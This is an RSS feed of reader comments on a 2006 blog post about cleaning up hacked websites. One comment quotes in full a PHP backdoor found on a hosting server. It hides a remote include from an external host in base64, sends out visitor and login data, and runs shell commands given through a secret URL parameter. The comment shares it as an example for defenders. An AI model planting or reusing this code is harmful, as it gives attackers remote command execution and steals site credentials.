<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/2.0.7" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Comments on: Fixing hacked sites</title>
	<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/</link>
	<description>Just another WordPress weblog</description>
	<pubDate>Sat, 17 May 2008 03:58:48 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.0.7</generator>

	<item>
		<title>by: Search Engines WEB</title>
		<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-55750</link>
		<pubDate>Sat, 28 Oct 2006 05:25:10 +0000</pubDate>
		<guid>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-55750</guid>
					<description>Read this horror story about an entire Large firm's Website being Hacked and Banned without  them even knowing about it

&lt;b&gt;seroundtable.com/archives/006534.html&lt;/b&gt; :-o

if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions

Does anyone think this could have been done by competitors - is this a trend?</description>
		<content:encoded><![CDATA[<p>Read this horror story about an entire Large firm&#8217;s Website being Hacked and Banned without  them even knowing about it</p>
<p><b>seroundtable.com/archives/006534.html</b> <img src='http://spamhuntress.com/wp-includes/images/smilies/icon_surprised.gif' alt=':-o' class='wp-smiley' /> </p>
<p>if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions</p>
<p>Does anyone think this could have been done by competitors - is this a trend?
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: Joe</title>
		<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46959</link>
		<pubDate>Sun, 01 Oct 2006 23:38:10 +0000</pubDate>
		<guid>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46959</guid>
					<description>XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks.  It appears databases are not being attacked in this way so far.  But I would still much prefer to restore a backup of the database if possible.</description>
		<content:encoded><![CDATA[<p>XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks.  It appears databases are not being attacked in this way so far.  But I would still much prefer to restore a backup of the database if possible.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: kay</title>
		<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46224</link>
		<pubDate>Fri, 29 Sep 2006 19:14:26 +0000</pubDate>
		<guid>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46224</guid>
					<description>girl u dobt know what you r talking about. have u heard about XSS?

how about MySQL Injection.

"We haven’t seen any cases of altered databases so far."
I did and used to do it.</description>
		<content:encoded><![CDATA[<p>girl u dobt know what you r talking about. have u heard about XSS?</p>
<p>how about MySQL Injection.</p>
<p>&#8220;We haven’t seen any cases of altered databases so far.&#8221;<br />
I did and used to do it.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: evariste</title>
		<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45079</link>
		<pubDate>Tue, 26 Sep 2006 10:17:50 +0000</pubDate>
		<guid>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45079</guid>
					<description>(it decodes to something.ru, I can't remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!)</description>
		<content:encoded><![CDATA[<p>(it decodes to something.ru, I can&#8217;t remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!)
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: evariste</title>
		<link>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45077</link>
		<pubDate>Tue, 26 Sep 2006 10:15:29 +0000</pubDate>
		<guid>http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45077</guid>
					<description>Here's an example that showed up on a Hosting Matters server, a couple of months ago. The filename is "common.php", but there were hundreds of these, named things like "date.php" and "time.php".

&lt;code&gt;
&#60;?php
error_reporting(0);
if(isset($_POST["l"])&#160;and&#160;isset($_POST["p"])){
&#160;&#160;&#160;&#160;if(isset($_POST["input"])){$user_auth="&#38;l=".&#160;base64_encode($_POST["l"])&#160;."&#38;p=".&#160;base64_encode(md5($_POST["p"]));}
&#160;&#160;&#160;&#160;else{$user_auth="&#38;l=".&#160;$_POST["l"]&#160;."&#38;p=".&#160;$_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&#38;log";}
if(!&#160;@include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")&#160;.&#160;sprintf("%u",&#160;ip2long(getenv(REMOTE_ADDR)))&#160;."&#38;url=".&#160;base64_encode($_SERVER["SERVER_NAME"]&#160;.&#160;$_SERVER[REQUEST_URI])&#160;.&#160;$user_auth&#160;.&#160;$log_flg))
{
&#160;&#160;&#160;&#160;if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
&#160;&#160;&#160;&#160;if($_POST["l"]=="special"){print&#160;"sys_active".&#160;`uname&#160;-a`;}
}
?&#62;&lt;/code&gt;</description>
		<content:encoded><![CDATA[<p>Here&#8217;s an example that showed up on a Hosting Matters server, a couple of months ago. The filename is &#8220;common.php&#8221;, but there were hundreds of these, named things like &#8220;date.php&#8221; and &#8220;time.php&#8221;.</p>
<p><code><br />
&lt;?php<br />
error_reporting(0);<br />
if(isset($_POST["l"])&nbsp;and&nbsp;isset($_POST["p"])){<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(isset($_POST["input"])){$user_auth="&amp;l=".&nbsp;base64_encode($_POST["l"])&nbsp;."&amp;p=".&nbsp;base64_encode(md5($_POST["p"]));}<br />
&nbsp;&nbsp;&nbsp;&nbsp;else{$user_auth="&amp;l=".&nbsp;$_POST["l"]&nbsp;."&amp;p=".&nbsp;$_POST["p"];}<br />
}else{$user_auth="";}<br />
if(!isset($_POST["log_flg"])){$log_flg="&amp;log";}<br />
if(!&nbsp;@include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")&nbsp;.&nbsp;sprintf("%u",&nbsp;ip2long(getenv(REMOTE_ADDR)))&nbsp;."&amp;url=".&nbsp;base64_encode($_SERVER["SERVER_NAME"]&nbsp;.&nbsp;$_SERVER[REQUEST_URI])&nbsp;.&nbsp;$user_auth&nbsp;.&nbsp;$log_flg))<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}<br />
&nbsp;&nbsp;&nbsp;&nbsp;if($_POST["l"]=="special"){print&nbsp;"sys_active".&nbsp;`uname&nbsp;-a`;}<br />
}<br />
?&gt;</code>
</p>
]]></content:encoded>
				</item>
</channel>
</rss>
